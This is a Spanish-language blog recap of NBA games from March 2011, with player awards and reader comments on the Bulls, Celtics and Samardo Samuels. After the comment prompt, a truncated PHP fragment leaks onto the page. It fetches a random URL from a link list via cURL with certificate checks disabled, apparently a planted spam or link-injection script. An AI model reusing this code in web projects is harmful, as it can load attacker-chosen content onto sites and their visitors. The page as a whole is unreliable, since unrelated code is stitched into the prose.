La Crónica (02/03/2011)

03 de March de 2011 por TheDeerHunter

Baño de agua fría de los Bulls en Atlanta. No porque sea un tropiezo bochornoso perder allí, una cancha complicada ante un rival bien armado, sinó más bien porque tenían el partido ganado en la primera parte y porque la remontada de los Hawks se fundamentó en dos aspectos: Un baño sideral que le pegó Horford a Boozer (por no decir a cada interior que se le puso por delante) y una esperpéntica efectividad en el tiro por parte del MVP. La última jugada es ejemplo de la calamidad que les sobrevino en la segunda parte y a bien seguro que deben hacérselo mirar si pretenden ser respetados en postemporada (80-83).

Los Celtics pusieron tierra de por medio gracias a una sólida victoria contra Phoenix (103-115). Gran actuación de todos los titulares, sobretodo de Garnett que se marcó un partidazo. Además lograron secar a Steve Nash aunque Aaron Brooks recogió el testigo cuajando su mejor registro desde que viste de Sun. La mala noticia para los verdes es que Glen Davis terminó lesionado. Más oportuno el fichaje de Murphy imposible.

Extraordinaria victoria de los Knicks ante unos Hornets que no levantan cabeza (88-107). Y eso que Billups no fue de la partida pero Toney Douglas lo suplió con sorprendente éxito. Chris Paul se encuentra en el peor momento de su carrera, con la cabeza visiblemente en otro lugar. Será una sorpresa si su equipo logra aguantar plaza de playoffs.

En el Oeste mucha actividad. Los Spurs alcanzan 50 victorias con la que lograron en Cleveland (109-99). George Hill dio un paso adelante y el equipo lo notó. A destacar el pedazo de actuación de Samardo Samuels en la cara de Tim Duncan. En Oklahoma, buen debut de Nazr Mohammed. Los Thunder ganaron cómodos a unos Pacers horribles, pero se les lesionó Durant (89-113). En Denver siguen celebrando el traspaso de Melo porque se les ve con un color estupendo. Le ganaron de 40 a los Bobcats, que no celebran tanto (80-120). 7 hombres en dobles figuras y disfrutando de minutos hasta el utillero. Consolidados en la 5ª plaza del Oeste, que no es moco de pavo. Justo un puesto por debajo se mantienen bien los Blazers. Lograron una importante victoria en Sacramento a pesar de la dupla Cousins-Thornton (107-102). En New Orleans deberían estar despidiendo a alguien en este preciso momento.

El batacazo del día se lo llevó Houston en el Staples ante los Clippers (103-106). Maldito el día para ellos que tenía que volver Eric Gordon. Qué lástima que estos Clippers terminen su temporada el 13 de Abril. Hubiera molado verles en la hora de la verdad.

Finalmente los Warriors ganaron en la capital (106-102) y Minnesotta en Detroit (116-105). 20-20 para Love… One more time.

PREMIOS

MVP: Soberano partido el de Al Horford, clave para remontar frente a los Bulls. Sus 31 puntos y 16 rebotes son la prueba de que se comió a su ex-compañero de universidad, Joakim Noah, y a Carlos Boozer.

Rookie: Blake Griffin y Demarcus Cousins cuajaron grandes actuaciones anoche. El primero, 20 puntos, 14 rebotes y 5 asistencias. El segundo, 28 puntos, 11 rebotes y 4 asistencias. ¿La diferencia? Griffin ganó y Cousins no.

Sorpresa: Samardo Samuels no fue drafteado por ninguna franquicia pero se ganó su contrato con los Cavs en las ligas de verano que disputó con los Bulls. Anoché jugó su primer partido de titular celebrándolo con 23 puntos y 10 rebotes.

Decepción: Los Nuggets le metieron anoche una paliza a los Bobcats de muy señor mío. Nada menos que 40 puntos de diferencia. La reconstrucción será dura en Charlotte.

Esfuerzo en vano: Partidazo “a lo Griffin” de Demarcus Cousins. Desgraciadamente y como ya hemos dicho antes, sus 28 puntos, 11 rebotes y 4 asistencias no fueron suficientes para lograr la victoria. A Kyle Lowry le pasó lo mismo con sus 24 puntos, 11 asistencias y 4 rebotes. ¿Alguien echa de menos a Brooks?

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Vaya partido que perdió anoche Chicago. Lo acabo de ver y una segunda parte nefasta sobre todo de Rose unida al repaso de Horford a todo el juego interior de los Bulls les hizo caer en un partido que debería haber sido suyo. No deben dejar que se les escapen muchos partidos así en esta recta final si quieren pelear con Celtics y Heat por el primer puesto del Este.
    En Boston partidazo de Garnett y de todos los titulares en general. Una última carga de los reservas de los Suns puso el partido caliente en la cancha no en el resultado y como resultado salió la lesión de Big Baby Davis. Parece que llevaba tiempo con ella y que de primeras no parece demasiado importante, quizás de 2 a 4 semanas aunque se sabrá hoy cuando le hagan más pruebas. Murphy no se enteró de mucho en su debut pero ahora que Davis estará un poco tiempo de baja su fichaje vendrá fenomenal a los Celtics que además se dice que ficharán a Shasha Pavlovic (no es muy de mi gusto) una vez que Corey Brewer parece que fichará por los Mavs en un movimiento muy bueno para los de Dallas.
    Nos espera un final de temporada interesantísimo, veremos como acaban colocados los aspirantes antes de los playoffs.

      Citar

  2. Hynreck dice:
    #2

    Partidazo de Samardo!!!
    Siempre confiamos en él!!

    Por otra parte brutal la actuación de Jason Collins en 16 minutos como titular.

      Citar

  3. rojorob dice:
    #3

    No Hynreck, no. No te subas al carro que aquí el único que apostó por Samardo fui you (véase la porra). ¿Estará a tiempo todavía para el premio a MIP? Yo creo que sí.

      Citar

  4. Hynreck dice:
    #4

    Colorado!
    No me dejas subir al carro entonces? Cagüen…
    Vale, vale, ya verás cuando tú o Txus os querais subir al de Bayless… 😛

    Un saludo!!

      Citar

  5. Sancho88 dice:
    #5

    bueno, ya está dicho, pero desde aquí otro palo a D-Rose. Creo que Chicago perdió ayer por su nula visión de juego. Vale que Horford estuvo espectacular, hasta metiendo triples y de todo, pero Rose sólo se dedicó a fallar triples y bueno, su doble doble se justifica porque Deng estaba enchufado desde fuera y las típicas asistencias de te la doy (a Boozer, Noah), pasan 10 segundos y la metes, pero como te di yo el pase…

    y luego atrás, muy mal Boozer, muy bien Asik, poniendo tapones y cogiendo rebotes, pero el resto del equipo flojito. Aparte, como Rose estaba tirándose hasta las zapatillas, Thibodeau (visiblemente desesperado) tiró de C.J. Watson… y el resultado fue aún peor. Menudo paquete. En fin, a los de Illinois no les estaba pasando estas cosas esta temporada, más bien me recuerdan a sus lapsus de la era Vinnie del Negro, cuando se dejaban llevar de verdad, jeje. Es un equipo que tienen que jugar siempre al 100% como Lakers, porque juegan con base anotador, sin pensar demasiado cada jugada, tirando de contraataques y espectáculo, y cuando se te desenchufa el base veloz que es Rose, el equipo se queda sin fuente de energía. Es una lástima, porque me parece que no veremos a los toros en las finales. El Miami – Boston parece cantado

      Citar

  6. Sancho88 dice:
    #6

    en el Este me refiero, claro

      Citar

  7. Len Bias dice:
    #7

    Chris Kaman, 17 tiros a canasta en 23 minutos, no sé muy bien como lo hizo. Aunque no le quedó mal partido, 21 puntos y 9 rebotes.

    He descubierto hoy al tal Samardo Samuels

      Citar

  8. Denise dice:
    #8

    ¿Soy el unico que piensa que a la larga (y sin contar los beneficios extradeportivos, camisetas, merchandising, etcetera) Denver saldrá ganando del trade con Melo, al igual que Philly salió ganando con el de Iverson por Andre Miller, y Joe Smith?

      Citar

  9. Txusma dice:
    #9

    Hynreck, diría que rojorob no es el ‘colorao’ que tu y yo conocemos 😀

      Citar

  10. Hynreck dice:
    #10

    Txus, en serio?
    Serendipia entonces?
    Alguna relación entre el color rojo y tu predilección por Samardo?
    Pues yo lo daba por sentado…

      Citar

  11. rojorob dice:
    #11

    Desconozco al colorao, así que serendipia pues.
    Y por otra parte confieso que en mi vida he visto jugar al tal Samardo. Ni siquiera a su hermana.
    Pero tuve una revelación en la porra que me va a hacer rico.
    Saludos!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>